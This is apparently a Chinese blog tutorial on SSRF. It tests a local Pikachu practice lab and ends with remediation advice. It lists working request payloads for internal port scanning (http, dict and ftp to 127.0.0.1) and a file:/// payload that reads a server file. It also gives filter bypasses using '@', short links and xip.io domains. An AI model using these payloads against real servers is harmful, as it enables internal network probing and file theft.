zl程序教程

您现在的位置是:首页 >  其他

当前栏目

Web安全 SSRF漏洞的 测试和利用.(读取服务器的任何文件)

2023-09-27 14:29:29 时间

SSRF漏洞的概括

SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个漏洞。(例如:攻击者操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务端的请求伪造)SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器.

目录

SSRF漏洞的利用步骤:

第一步:确定网站存在 SSRF 漏洞.

第二步:使用SSRF漏洞,对服务器端口进行扫描(也可以利用burp 来进行爆破)

第三步:使用 SSRF 漏洞,对服务器的文件进行读取.

关于SSRF基础的绕过:

(1)攻击本地

(2)利用 @

(3)利用 短地址.

(4)利用 特殊域名.

SSRF漏洞修复建议:


攻击的目标:从外网无法访问内部系统.


形成的原因:由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过虑与限制.


靶场:

本地自己搭建的 Pikachu(皮卡丘)靶场:安装在win 2003(IP地址:192.168.0.102)

 Pikachu(皮卡丘)靶场搭建链接:Web安全 Pikachu(皮卡丘)靶场搭建._半个西瓜.的博客-CSDN博客


SSRF漏洞的利用步骤:

第一步:确定网站存在 SSRF 漏洞.


第二步:使用SSRF漏洞,对服务器端口进行扫描(也可以利用burp 来进行爆破

url=http://127.0.0.1:3306


url=dict://127.0.0.1:3306/info


url=ftp://127.0.0.1:21


第三步:使用 SSRF 漏洞,对服务器的文件进行读取.

url=file:///c://phpStudy/WWW/phpMyAdmin/webapp.php


关于SSRF基础的绕过:

(1)攻击本地

http://127.0.0.1:80
http://localhost:22

(2)利用 @

http://example.com@127.0.0.1

(3)利用 短地址.

http://dwz.cn/11SMa  >>  http://127.0.0.1

(4)利用 特殊域名.

http://127.0.0.1.xip.io/        #利用的原理是DNS解析

SSRF漏洞修复建议:

(1)限制请求的端口只能为 Web 端口,只允许访问 HTTP HTTPS 的请求.

(2)黑名单内网 IP,避免应用被用来获取获取内网数据,攻击内网.

(3)屏蔽返回的详细信息.

    


参考链接:SSRF漏洞(原理、漏洞利用、修复建议) - coderge - 博客园

参考链接:SSRF详解_Tasfa的博客-CSDN博客_ssrf详解